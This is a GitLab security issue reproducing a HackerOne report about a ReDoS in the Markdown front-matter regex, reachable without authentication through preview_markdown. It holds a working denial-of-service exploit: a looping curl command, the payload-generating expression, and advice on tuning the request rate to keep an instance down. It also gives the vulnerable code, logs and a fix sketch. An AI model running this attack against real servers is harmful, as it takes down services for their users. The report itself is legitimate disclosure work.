ReDoS via FrontMatterFilter in any Markdown fields
:warning: **Please read [the process](https://gitlab.com/gitlab-org/release/docs/-/blob/master/general/security/developer.md) on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.**
**[HackerOne report #1943819](https://hackerone.com/reports/1943819)** by `ryhmnlfj` on 2023-04-12, assigned to @greg:
[Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce)
## Report
#### Summary
I found a server-side ReDoS via `FrontMatterFilter` that is reachable from any Markdown field.
An attacker can take down a GitLab instance by sending **unauthenticated requests** containing a crafted payload to the `preview_markdown` endpoint.
#### Preparation before reproducing the bug
Please install the command line tools `ruby` and `curl` on your computer.
Also, please download `FrontMatterFilter_ReDoS_payload.json` attached to this report.
These will be used in step 11 of the "Steps to reproduce" section.
And most importantly, please prepare a GitLab instance that you can use personally.
**DO NOT try to reproduce this bug against `gitlab.com` or other public instances.**
#### Steps to reproduce
1. Set up and launch your GitLab instance, and create a new account on it.
2. Sign in to the account you created in step 1.
3. Create a new **public group** and make a note of **the public group name** at this time.

4. Sign out as you will be accessing as an unauthenticated user in the following steps.
5. After launching your browser's developer tools, browse to the **public group** you created in step 3 as an unauthenticated user.
6. Check the HTML rendered in step 5 and take a note of the content of `csrf-token` at this time.

7. Check the request sent to your GitLab instance in step 5 and take a note of the value of `_gitlab_session` at this time.

8. Close your browser and open a command console.
9. Let's construct the command to demonstrate the ReDoS. Replace each string in the command template according to the replacement table.
* Command template:
```
ruby -e 'while true do p spawn("curl --header Content-Type:application/json --header X-CSRF-Token:[CSRF_TOKEN_VALUE] --header Cookie:_gitlab_session=[SESSION_VALUE] --data @FrontMatterFilter_ReDoS_payload.json http://[YOUR_GITLAB_INSTANCE_DOMAIN]/groups/[PUBLIC_GROUP_NAME]/preview_markdown"); sleep 1; end'
```
* Replacement table:
| String in the command template | Replace with |
|---------------------------------|------------------------------------------------|
| `[CSRF_TOKEN_VALUE]` | the content of `csrf-token` noted in step 6 |
| `[SESSION_VALUE]` | the value of `_gitlab_session` noted in step 7 |
| `[YOUR_GITLAB_INSTANCE_DOMAIN]` | the domain string of your instance |
| `[PUBLIC_GROUP_NAME]` | **the public group name** noted in step 3 |
For reference, here's an example in my local environment:
```
ruby -e 'while true do p spawn("curl --header Content-Type:application/json --header X-CSRF-Token:E_NhtPEqA7IpGGSH0jgsfRtruz5fAeeqRxQgBn-kl2mCkdxxBHP4HC9YdK6_mDdZqxCkhzkjSzESZOvAGwJQPQ --header Cookie:_gitlab_session=26c454aeadefc013a10a0fdddabcfd12 --data @FrontMatterFilter_ReDoS_payload.json http://my-gitlab-h1.test/groups/public_group_for_test/preview_markdown"); sleep 1; end'
```
10. Change the current directory of the command console to the directory where `FrontMatterFilter_ReDoS_payload.json` is saved.
11. Run the command constructed in step 9 in the command console, and confirm that CPU usage on the instance rises sharply.
For reference, when I ran the above command, the CPU of my instance (16 CPU cores and 32GB of memory) was quickly exhausted.

_NOTE: If you can confirm a surge in CPU usage at step 11, that's enough confirmation that this bug is a valid ReDoS vulnerability, based on past valid reports._
_NOTE 2: This crafted command will keep sending requests until you force it to stop. Please be sure to terminate the command after confirming the vulnerability._
###### Details about the command constructed in step 9:
The command sends 1 request per second, and each request that triggers the ReDoS exhausts the resources of 1 CPU core.
The GitLab instance has a default timeout of 60 seconds per request. However, because the load per request is so high, many worker processes do not finish processing even after the timeout has passed.
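As a rough illustration of why 1 request per second is enough, the following back-of-envelope sketch applies Little's law (in-flight requests = arrival rate × time each request stays in the system). It assumes every malicious request occupies a core for at least the full 60-second timeout and ignores worker pool limits, so it is only an estimate. The helper name `in_flight_requests` is hypothetical.

```ruby
# Back-of-envelope estimate using Little's law.
# Assumption: each malicious request keeps one core busy for at least
# `seconds_per_request` (here the 60 s default timeout from the report).
def in_flight_requests(rps:, seconds_per_request:)
  rps * seconds_per_request
end

cores = 16      # CPU cores of the reporter's test instance
timeout_s = 60  # default request timeout in seconds

[0.5, 1, 2].each do |rps|
  busy = in_flight_requests(rps: rps, seconds_per_request: timeout_s)
  puts format('%.1f RPS -> about %d requests in flight (instance has %d cores)',
              rps, busy, cores)
end
```

Under these assumptions, even 0.5 RPS keeps more requests in flight than the test instance has cores.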
#### Additional information to confirm this vulnerability meets the `A:H` and `S:C` criteria
_IMPORTANT NOTE: This section contains additional information to confirm that this vulnerability meets the criteria for `A:H` and `S:C`. Please use this information after triage, as this section contains time-consuming steps and may be an over-verification of whether this report is valid._
If the GitLab instance is attacked at a well-tuned RPS (requests per second) rate for a reasonable amount of time, then for as long as the attack continues, the instance will take 60+ seconds to process every single request.
This indicates that timeouts are not working well under heavy load.
As a result, a `500 error` is returned for every request.

Below I describe how to attack at a well-tuned RPS rate for a reasonable amount of time **by using the command constructed in step 9 of the "Steps to reproduce" section** of this report.
1. Before running the constructed command, maintain a separate session as an authenticated user by signing in to the instance with a different browser than the one used to obtain the unauthenticated user's CSRF token and session.
2. Iterate on executing the constructed command and adjusting the RPS rate.
The constructed command will display the PIDs of the spawned `curl` processes and the responses from the instance in the console.
Please adjust the RPS rate as described below so that 1 or 2 PIDs and several `500 error` responses are alternately displayed.
* We can adjust the RPS rate by changing the `sleep` value at the end of the command. For example, changing to `sleep 1;` will result in `RPS = 1`, `sleep 0.5;` will result in `RPS = 2`, and `sleep 2;` will result in `RPS = 0.5`.
* We need to adjust the RPS rate so that [it does not exceed the "Test RPS rates" (described in "Clarifying notes")](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/#clarifying-notes). As an example, for the [1k Reference Architecture](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html), "Test RPS rates" is 2 RPS.
_NOTE: Since the default timeout is 60 seconds, we need to wait a few minutes after executing the command to see the PIDs and error responses displayed alternately. It is not a problem if several PIDs are occasionally displayed in a row, but if the alternation is clearly not happening, please stop the command and adjust the RPS rate._
3. **With the tuned command still running**, visit any page on the instance with the authenticated user's session maintained in step 1 of this section.
Check whether a `500 error` is returned after a response delay of 60+ seconds.
After you start getting `500 errors` for authenticated requests, wait tens of minutes and you'll start getting `500 errors` for unauthenticated requests and requests to the API.
_NOTE: This behavior seems to occur because handling authenticated requests tends to be more complex than handling unauthenticated requests._
When I tested it on my instance, it took about 10-20 minutes at a rate of 1 RPS for my instance (16 CPU cores and 32GB of memory) to reach the above DoS state.
Also, when I looked at the runner logs in this state, I could see that the runner was failing to pick up the jobs.
```
$ sudo docker logs my_runner_container
[...snip...]
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
```
Since I was using the [`gitlab/gitlab-runner:alpine` image](https://docs.gitlab.com/runner/install/docker.html#docker-images) for testing, I ran the `docker logs` command to see the runner logs.
Additionally, in a pipeline whose run overlapped with the above DoS state, the jobs failed with a timeout because the runner was unable to communicate with the instance, and the subsequent jobs in the pipeline were not run.


These observations show that the instance has been completely taken down, so this vulnerability fully meets the [`A:H` criteria](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/#clarifying-notes).
It also meets the `S:C` criteria because the instance returns a `500 error` for any HTTP request from other components, which significantly affects their behavior.
#### What is the current bug behavior?
The vulnerable regular expression exists in the following part of the source code.
https://gitlab.com/gitlab-org/gitlab/-/blob/v15.10.2-ee/lib/gitlab/front_matter.rb#L3-20
```ruby
module Gitlab
  module FrontMatter
    DELIM_LANG = {
      '---' => 'yaml',
      '+++' => 'toml',
      ';;;' => 'json'
    }.freeze

    DELIM = Regexp.union(DELIM_LANG.keys)

    PATTERN = %r{
      \A(?<encoding>[^\r\n]*coding:[^\r\n]*\R)? # optional encoding line
      (?<before>\s*)
      ^(?<delim>#{DELIM})[ \t]*(?<lang>\S*)\R # opening front matter marker (optional language specifier)
      (?<front_matter>.*?) # front matter block content (not greedy)
      ^(\k<delim> | \.{3}) # closing front matter marker
      [^\S\r\n]*(\R|\z)
    }mx.freeze
```
Matching `Gitlab::FrontMatter::PATTERN` against a specially crafted string causes severe backtracking.
This crafted string can be easily generated with the Ruby code `"coding:" * 120_000 + "\n" * 80_000 + ";"`.
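To see how the matching cost grows, here is a minimal sketch that copies the pattern from the excerpt above and times it against scaled-down inputs of the same shape. The helper `scaled_payload` and the chosen sizes are assumptions for illustration only. The sizes are deliberately tiny so the script finishes quickly. The encoding line can end at any of the repeated `coding:` occurrences, and for each of those `\s*` is retried at every newline, so the work grows roughly with the product of the two repeat counts. Absolute timings depend on the Ruby version and hardware.

```ruby
require 'benchmark'

# Copied from the excerpt above (lib/gitlab/front_matter.rb, v15.10.2-ee).
DELIM_LANG = {
  '---' => 'yaml',
  '+++' => 'toml',
  ';;;' => 'json'
}.freeze

DELIM = Regexp.union(DELIM_LANG.keys)

PATTERN = %r{
  \A(?<encoding>[^\r\n]*coding:[^\r\n]*\R)? # optional encoding line
  (?<before>\s*)
  ^(?<delim>#{DELIM})[ \t]*(?<lang>\S*)\R # opening front matter marker (optional language specifier)
  (?<front_matter>.*?) # front matter block content (not greedy)
  ^(\k<delim> | \.{3}) # closing front matter marker
  [^\S\r\n]*(\R|\z)
}mx.freeze

# Hypothetical helper: same shape as the payload in the report
# ("coding:" * 120_000 + "\n" * 80_000 + ";"), but 1000x smaller at scale 1.
def scaled_payload(scale)
  ('coding:' * (120 * scale)) + ("\n" * (80 * scale)) + ';'
end

# Doubling the scale doubles the input length; compare how the time grows.
[1, 2, 4].each do |scale|
  input = scaled_payload(scale)
  seconds = Benchmark.realtime { PATTERN.match(input) }
  puts format('scale=%d length=%d time=%.5fs', scale, input.length, seconds)
end
```

The crafted input never matches (it ends in a single `;`, which is not a valid delimiter), so the engine has to exhaust every backtracking path before giving up.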
The match of `Gitlab::FrontMatter::PATTERN` against the actual input string is performed in the `FrontMatterFilter#call` method below.
https://gitlab.com/gitlab-org/gitlab/-/blob/v15.10.2-ee/lib/banzai/filter/front_matter_filter.rb#L3-9
```ruby
module Banzai
  module Filter
    class FrontMatterFilter < HTML::Pipeline::Filter
      def call
        lang_mapping = Gitlab::FrontMatter::DELIM_LANG

        html.sub(Gitlab::FrontMatter::PATTERN) do |_match|
```
#### What is the expected correct behavior?
We should either rewrite `Gitlab::FrontMatter::PATTERN` so that it doesn't cause severe backtracking, or write code that does the equivalent without using regular expressions.
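As an illustration of the second option, the sketch below splits front matter with a single pass over the lines instead of a regular expression. It is a hypothetical example, not GitLab's actual fix. The names `split_front_matter` and `FRONT_MATTER_DELIMS` are made up for this sketch, and it only approximates the behavior of `PATTERN`: it recognizes `\n` and `\r\n` line endings only, treats any first line containing `coding:` as the encoding line, and assumes the language defaults to the one mapped to the delimiter.

```ruby
# Hypothetical sketch, not GitLab's actual fix: a single-pass, line-based
# front matter splitter whose running time is linear in the input length.
FRONT_MATTER_DELIMS = { '---' => 'yaml', '+++' => 'toml', ';;;' => 'json' }.freeze

def split_front_matter(text)
  lines = text.lines # each element keeps its trailing line terminator
  idx = 0

  # Optional encoding line (approximation: any first line containing "coding:").
  idx += 1 if lines[idx]&.include?('coding:')

  # Skip blank lines before the opening marker.
  idx += 1 while idx < lines.size && lines[idx].strip.empty?

  opener = lines[idx]
  return nil if opener.nil? || !opener.end_with?("\n")

  delim = FRONT_MATTER_DELIMS.keys.find { |d| opener.start_with?(d) }
  return nil unless delim

  # Optional language specifier: at most one token, no trailing whitespace.
  spec = opener[delim.size..-1].chomp.lstrip
  return nil unless spec == spec.rstrip && spec.split.size <= 1

  lang = spec.empty? ? FRONT_MATTER_DELIMS[delim] : spec

  # Scan forward once for the closing marker (same delimiter or "...").
  body_start = idx + 1
  (body_start...lines.size).each do |i|
    marker = lines[i].rstrip
    next unless marker == delim || marker == '...'

    return {
      lang: lang,
      front_matter: lines[body_start...i].join,
      rest: lines[(i + 1)..-1].join
    }
  end

  nil # no closing marker found
end

result = split_front_matter("---\ntitle: x\n---\nbody\n")
puts result.inspect
```

Because every line is visited at most once, the full-size payload from this report is rejected without any backtracking.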
#### Relevant logs and/or screenshots
I put references to the screenshots at the appropriate places in this report.
I also attach the stack trace captured when a request was forcibly stopped after 60+ seconds.
```
Rack::Timeout::RequestTimeoutException (Request ran for longer than 60000ms ):
lib/banzai/filter/front_matter_filter.rb:9:in `sub'
lib/banzai/filter/front_matter_filter.rb:9:in `call'
lib/banzai/pipeline/base_pipeline.rb:23:in `block (2 levels) in singleton class'
lib/banzai/renderer.rb:128:in `render_result'
lib/banzai/renderer.rb:166:in `cacheless_render'
lib/banzai/renderer.rb:30:in `render'
lib/banzai/renderer.rb:120:in `block in cache_collection_render'
lib/banzai/renderer.rb:119:in `each'
lib/banzai/renderer.rb:119:in `cache_collection_render'
lib/banzai/reference_extractor.rb:33:in `html_documents'
lib/banzai/reference_extractor.rb:18:in `references'
lib/gitlab/reference_extractor.rb:24:in `references'
lib/gitlab/reference_extractor.rb:43:in `block (2 levels) in <class:ReferenceExtractor>'
app/services/preview_markdown_service.rb:33:in `find_user_references'
app/services/preview_markdown_service.rb:6:in `execute'
app/controllers/concerns/preview_markdown.rb:8:in `preview_markdown'
ee/lib/gitlab/ip_address_state.rb:10:in `with'
ee/app/controllers/ee/application_controller.rb:46:in `set_current_ip_address'
app/controllers/application_controller.rb:524:in `set_current_admin'
lib/gitlab/session.rb:11:in `with_session'
app/controllers/application_controller.rb:515:in `set_session_storage'
lib/gitlab/i18n.rb:107:in `with_locale'
app/controllers/application_controller.rb:508:in `set_locale'
app/controllers/application_controller.rb:499:in `set_current_context'
lib/gitlab/metrics/elasticsearch_rack_middleware.rb:16:in `call'
lib/gitlab/middleware/memory_report.rb:13:in `call'
lib/gitlab/middleware/speedscope.rb:13:in `call'
lib/gitlab/database/load_balancing/rack_middleware.rb:23:in `call'
lib/gitlab/middleware/rails_queue_duration.rb:33:in `call'
lib/gitlab/metrics/rack_middleware.rb:16:in `block in call'
lib/gitlab/metrics/web_transaction.rb:46:in `run'
lib/gitlab/metrics/rack_middleware.rb:16:in `call'
lib/gitlab/jira/middleware.rb:19:in `call'
lib/gitlab/middleware/go.rb:20:in `call'
lib/gitlab/etag_caching/middleware.rb:21:in `call'
lib/gitlab/middleware/query_analyzer.rb:11:in `block in call'
lib/gitlab/database/query_analyzer.rb:37:in `within'
lib/gitlab/middleware/query_analyzer.rb:11:in `call'
lib/gitlab/middleware/multipart.rb:173:in `call'
lib/gitlab/middleware/read_only/controller.rb:50:in `call'
lib/gitlab/middleware/read_only.rb:18:in `call'
lib/gitlab/middleware/same_site_cookies.rb:27:in `call'
lib/gitlab/middleware/basic_health_check.rb:25:in `call'
lib/gitlab/middleware/handle_malformed_strings.rb:21:in `call'
lib/gitlab/middleware/handle_ip_spoof_attack_error.rb:25:in `call'
lib/gitlab/middleware/request_context.rb:21:in `call'
lib/gitlab/middleware/webhook_recursion_detection.rb:15:in `call'
config/initializers/fix_local_cache_middleware.rb:11:in `call'
lib/gitlab/middleware/compressed_json.rb:37:in `call'
lib/gitlab/middleware/rack_multipart_tempfile_factory.rb:19:in `call'
lib/gitlab/middleware/sidekiq_web_static.rb:20:in `call'
lib/gitlab/metrics/requests_rack_middleware.rb:79:in `call'
lib/gitlab/middleware/release_env.rb:13:in `call'
```
#### Output of checks
This bug happens on the official Docker installation of GitLab Enterprise Edition `15.10.2-ee`.
I used `Chromium 112` and `Firefox 112` on Debian 11 to verify this bug.
###### Results of GitLab environment info
Output of `sudo gitlab-rake gitlab:env:info`:
```
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 3.0.5p211
Gem Version: 3.2.33
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.11
Sidekiq Version:6.5.7
Go Version: unknown
GitLab information
Version: 15.10.2-ee
Revision: a54d6973eae
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.8
URL: http://my-gitlab-h1.test
HTTP Clone URL: http://my-gitlab-h1.test/some-group/some-project.git
SSH Clone URL: git@my-gitlab-h1.test:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.18.0
Repository storages:
- default: unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
```
#### Impact
By exploiting this ReDoS vulnerability, an unauthenticated attacker could significantly reduce the availability of the entire GitLab instance.
Based on [the policy of GitLab's Bug Bounty Program](https://hackerone.com/gitlab?view_policy=true), past reports, and my research on the impact of this bug, I would suggest the following CVSS score:
```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
8.6 (High)
```
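For reference, the score for the vector above can be reproduced with the base score equations from the CVSS v3.1 specification. The sketch below is a minimal implementation of those equations for base metrics only. The function names `roundup` and `cvss31_base_score` are chosen for this example, and the metric weights are the ones published in the specification.

```ruby
# Minimal CVSS v3.1 base score calculation (base metrics only).
AV  = { 'N' => 0.85, 'A' => 0.62, 'L' => 0.55, 'P' => 0.2 }.freeze
AC  = { 'L' => 0.77, 'H' => 0.44 }.freeze
UI  = { 'N' => 0.85, 'R' => 0.62 }.freeze
CIA = { 'H' => 0.56, 'L' => 0.22, 'N' => 0.0 }.freeze

# "Roundup" as defined in the specification: smallest number with one
# decimal place that is greater than or equal to the input.
def roundup(value)
  int_input = (value * 100_000).round
  return int_input / 100_000.0 if (int_input % 10_000).zero?

  ((int_input / 10_000) + 1) / 10.0
end

def cvss31_base_score(vector)
  # Drop the "CVSS:3.1" prefix and turn "AV:N/AC:L/..." into a hash.
  m = vector.split('/').drop(1).map { |pair| pair.split(':') }.to_h
  changed = m['S'] == 'C'

  # Privileges Required weights depend on whether the scope changes.
  pr = { 'N' => 0.85, 'L' => changed ? 0.68 : 0.62, 'H' => changed ? 0.5 : 0.27 }

  iss = 1 - (1 - CIA[m['C']]) * (1 - CIA[m['I']]) * (1 - CIA[m['A']])
  impact = if changed
             7.52 * (iss - 0.029) - 3.25 * (iss - 0.02)**15
           else
             6.42 * iss
           end
  return 0.0 if impact <= 0

  exploitability = 8.22 * AV[m['AV']] * AC[m['AC']] * pr[m['PR']] * UI[m['UI']]
  total = changed ? 1.08 * (impact + exploitability) : impact + exploitability
  roundup([total, 10].min)
end

puts cvss31_base_score('CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H') # prints 8.6
```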
I would also like to add some detailed explanations of the notable points in the above score.
* `PR:N` : As described in the "Steps to reproduce" section, this attack can be performed by an unauthenticated attacker.
* `S:C` : Since this ReDoS attack causes all endpoints of the GitLab instance to become unresponsive, it also affects the behavior of other components that rely on HTTP communication with the instance. For example, [user-configured integrations](https://docs.gitlab.com/ee/integration/), uploading artifacts from [runners](https://docs.gitlab.com/runner/), [GitLab Pages](https://docs.gitlab.com/ee/administration/pages/) that rely on downloading artifacts, etc. are affected by the unresponsive state of the GitLab instance.
* `A:H` : This ReDoS attack causes enough load to meet the `A:H` criteria for the [1k Reference Architecture](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html) as stated on the [GitLab CVSS Calculator page](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/).
More specifically, this attack clearly satisfies the "Clarifying notes" condition in [GitLab CVSS Calculator page](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/).
> When evaluating Availability impacts for DoS that require sustained traffic, use the [1k Reference Architecture](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html). The number of requests must be fewer than the "test request per seconds rates" and cause 10+ seconds of user-perceivable unavailability to rate the impact as `A:H`.
In addition to the above, it is important to note that any feature with Markdown fields is vulnerable to this ReDoS attack.
## Attachments
**Warning:** Attachments received through HackerOne, please exercise caution!
* [FrontMatterFilter_ReDoS_payload.json](https://h1.sec.gitlab.net/a/40760983-7ec1-4142-9a86-b7473bf89573/FrontMatterFilter_ReDoS_payload.json)
* [create_public_group.png](https://h1.sec.gitlab.net/a/5f922732-0568-4710-a8b4-c94c7965fcf7/create_public_group.png)
* [csrf_token.png](https://h1.sec.gitlab.net/a/8b0fd84a-13b9-41a5-81f0-f01a9ad9b66f/csrf_token.png)
* [session_value.png](https://h1.sec.gitlab.net/a/2f3a5f61-1c9c-42fc-81a7-9c78b447474f/session_value.png)
* [htop_all_cores_exhausted.png](https://h1.sec.gitlab.net/a/bcc5ec5e-cd8c-4d12-8953-467ba83cf445/htop_all_cores_exhausted.png)
* [500_error.png](https://h1.sec.gitlab.net/a/d03848b1-7307-4b47-a474-5021b24d9696/500_error.png)
* [failed_pipeline.png](https://h1.sec.gitlab.net/a/b8bb36a7-2777-458d-bc2b-8f322fc597ee/failed_pipeline.png)
* [failed_jobs_timeout.png](https://h1.sec.gitlab.net/a/40464c34-b5dd-4807-af25-5a7a8986d9fb/failed_jobs_timeout.png)
## How To Reproduce
Please add [reproducibility information] to this section:
1.
1.
1.
[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues